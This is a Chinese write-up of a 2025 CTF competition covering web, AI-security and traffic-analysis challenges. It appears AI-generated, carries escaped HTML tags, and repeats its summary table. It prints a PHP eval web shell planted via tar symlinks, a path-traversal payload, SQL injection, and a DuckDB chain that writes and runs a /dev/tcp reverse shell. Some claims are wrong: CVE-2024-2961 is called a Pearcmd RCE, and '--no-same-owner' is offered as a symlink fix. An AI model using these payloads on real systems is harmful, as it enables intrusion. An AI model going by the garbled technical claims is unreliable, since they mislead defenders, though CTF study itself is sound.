2025第五届“长城杯”网络安全大赛 Write-up 教学文档<\/h2>

一、Web安全类题目<\/h3>

1. 文曲签学<\/h4>

题目类型<\/strong>：Web目录穿越漏洞<\/li>

关键点<\/strong>：

页面提示“长按Fn键”，通过#list<\/code>发现HINT。<\/li>
HINT提示关注公众号，获取目录穿越提示。<\/li> <\/ul> <\/li>
利用方法<\/strong>：使用#read<\/code>功能进行目录穿越： #read ...\/\/....\/\/....\/\/....\/\/flag <\/code><\/pre> <\/li> <\/ul> <\/li> 漏洞原理<\/strong>：未对文件读取路径进行规范化处理，导致可通过..\/<\/code>穿越目录。<\/li> 修复建议<\/strong>：对输入路径进行正则化处理，禁止..\/<\/code>等跳转字符。<\/li> <\/ul> 2. EZ_upload<\/h4> 题目类型<\/strong>：文件上传 + Tar命令注入（软链接利用）<\/li> 源码分析<\/strong>： $filename =<\/span> basename<\/span>($file['name'<\/span>]); <\/span><\/span>$filename =<\/span> preg_replace<\/span>('\/[^a-zA-Z0-9_\-\.]\/'<\/span>, '_'<\/span>, $filename); <\/span><\/span>exec<\/span>('cd \/tmp && tar -xvf '<\/span> .<\/span> $filename.<\/span>'&&pwd'<\/span>); <\/span><\/span><\/code><\/pre> 文件名过滤了非字母数字字符，但允许_<\/code>、-<\/code>和.<\/code>。<\/li> 直接拼接文件名执行tar<\/code>命令，存在命令注入风险。<\/li> <\/ul> <\/li> 利用方法<\/strong>：创建软链接指向Web目录： ln -s \/var\/www\/html link1 <\/span><\/span>tar -cvf syslink.tar link1 <\/span><\/span>rm link1 <\/span><\/span>mkdir link1 <\/span><\/span>echo '<?php @eval($_POST["cmd"]); ?>'<\/span> > link1\/shell.php <\/span><\/span>tar -cvf shell.tar link1\/shell.php <\/span><\/span><\/code><\/pre><\/li> 依次上传syslink.tar<\/code>和shell.tar<\/code>，通过Tar解压软链接实现文件写入。<\/li> <\/ol> <\/li> 漏洞原理<\/strong>：Tar保留软链接属性，解压时可将软链接解析为目标路径，从而实现任意文件写入。<\/li> 修复建议<\/strong>：禁用Tar命令的软链接处理（如--no-same-owner<\/code>）。<\/li> 使用安全函数（如escapeshellarg()<\/code>）处理命令行参数。<\/li> <\/ul> <\/li> <\/ul> 3. SeRce<\/h4> 题目类型<\/strong>：PHP反序列化 + CVE-2024-2961（Pearcmd RCE）<\/li> 漏洞原理<\/strong>：利用__PHP_Incomplete_Class_Name<\/code>类触发Pearcmd.php包含漏洞。<\/li> 通过反序列化链调用Access::getToken()<\/code>方法拼接路径，触发Pearcmd执行。<\/li> <\/ul> <\/li> 利用方法<\/strong>：使用已知EXP（如Lilctf脚本）生成Payload： class<\/span> Access<\/span> { <\/span><\/span> protected<\/span> $prefix =<\/span> 'phar:\/\/'<\/span>; <\/span><\/span> protected<\/span> $suffix =<\/span> '\/pearcmd.php'<\/span>; <\/span><\/span>} <\/span><\/span>\/\/ 构造Phar包触发包含执行命令 <\/span><\/span><\/span><\/code><\/pre><\/li> 发送序列化数据触发RCE。<\/li> <\/ul> <\/li> 修复建议<\/strong>：避免反序列化用户输入。<\/li> 更新Pearcmd至安全版本。<\/li> <\/ul> <\/li> <\/ul> 二、AI安全类题目<\/h3> 1. eztalk<\/h4> 题目类型<\/strong>：AI数据库注入（CVE-2024-11958）<\/li> 漏洞原理<\/strong>：输入未过滤导致SQL注入，通过Union查询执行系统命令。<\/li> <\/ul> <\/li> 利用方法<\/strong>： test') AS score, node_id, text FROM documents UNION SELECT '<\/span>1500<\/span>', '<\/span>!<\/span>', concat('<\/span>life', version())-- <\/span><\/span><\/span><\/code><\/pre> 确认漏洞后，利用COPY命令写入Shell： COPY<\/span> (SELECT<\/span> 'sh -i >& \/dev\/tcp\/0.0.0.0\/4444 0>&1'<\/span>) TO<\/span> '\/tmp\/exploit'<\/span>; <\/span><\/span><\/code><\/pre><\/li> 通过read_csv<\/code>执行命令： SELECT<\/span> *<\/span> FROM<\/span> read_csv('bash \/tmp\/exploit |'<\/span>); <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 修复建议<\/strong>：对用户输入进行严格的SQL注入过滤。<\/li> 限制数据库用户权限，禁止执行系统命令。<\/li> <\/ul> <\/li> <\/ul> 2. easy_poison<\/h4> 题目类型<\/strong>：数据投毒（Data Poisoning）<\/li> 漏洞原理<\/strong>：通过污染训练数据影响AI模型输出。<\/li> 利用方法<\/strong>：构造恶意训练数据，插入误导性样本（如虚假Flag）。<\/li> 重新训练模型，使模型输出恶意内容。<\/li> <\/ul> <\/li> 修复建议<\/strong>：使用可信数据源进行训练。<\/li> 对训练数据进行完整性校验。<\/li> <\/ul> <\/li> <\/ul> 三、数据安全类题目<\/h3> 1. RealCheckIn-1<\/h4> 题目类型<\/strong>：流量分析 + Base64隐写<\/li> 利用方法<\/strong>：在Wireshark中追踪HTTP流（流编号1102）。<\/li> 发现Base64编码数据，解码后写入fffllagg1.txt<\/code>。<\/li> 使用CyberChef解码获取Flag。<\/li> <\/ul> <\/li> 关键点<\/strong>：注意流量中隐藏的编码数据。<\/li> <\/ul> 2. RealCheckIn-3<\/h4> 题目类型<\/strong>：内存马利用（Java Agent注入）<\/li> 分析过程<\/strong>：在流量（流1122）中提取payload1.jar<\/code>。<\/li> 反编译后发现是内存马框架，用于注入Java Agent。<\/li> <\/ul> <\/li> 利用方法<\/strong>（未完全解出）：通常通过JNDI注入或反序列化触发Agent加载。<\/li> <\/ul> <\/li> 修复建议<\/strong>：禁止加载不可信的Java Agent。<\/li> 监控JVM进程异常行为。<\/li> <\/ul> <\/li> <\/ul> 四、总结与防护建议<\/h3> 漏洞类型<\/th> 利用技术<\/th> 防护措施<\/th> <\/tr> <\/thead> 目录穿越<\/td> 路径遍历<\/td> 路径规范化<\/td> <\/tr> 文件上传+软链接<\/td> Tar软链接处理<\/td> 禁用软链接解压<\/td> <\/tr> PHP反序列化<\/td> Pearcmd RCE<\/td> 禁止反序列化用户输入<\/td> <\/tr> SQL注入（AI）<\/td> CVE-2024-11958<\/td> 输入过滤、权限控制<\/td> <\/tr> 数据投毒<\/td> 训练数据污染<\/td> 数据源可信校验<\/td> <\/tr> 流量隐写<\/td> Base64解码<\/td> 流量监控与检测<\/td> <\/tr> 内存马<\/td> Java Agent注入<\/td> JVM安全配置<\/td> <\/tr> <\/tbody> <\/table> 如果有需要修改或者补充的地方，可以随时告诉我。<\/p>

漏洞类型<\/th>	利用技术<\/th>	防护措施<\/th> <\/tr> <\/thead>
目录穿越<\/td>	路径遍历<\/td>	路径规范化<\/td> <\/tr>
文件上传+软链接<\/td>	Tar软链接处理<\/td>	禁用软链接解压<\/td> <\/tr>
PHP反序列化<\/td>	Pearcmd RCE<\/td>	禁止反序列化用户输入<\/td> <\/tr>
SQL注入（AI）<\/td>	CVE-2024-11958<\/td>	输入过滤、权限控制<\/td> <\/tr>
数据投毒<\/td>	训练数据污染<\/td>	数据源可信校验<\/td> <\/tr>
流量隐写<\/td>	Base64解码<\/td>	流量监控与检测<\/td> <\/tr>
内存马<\/td>	Java Agent注入<\/td>	JVM安全配置<\/td> <\/tr> <\/tbody> <\/table> 如果有需要修改或者补充的地方，可以随时告诉我。<\/p>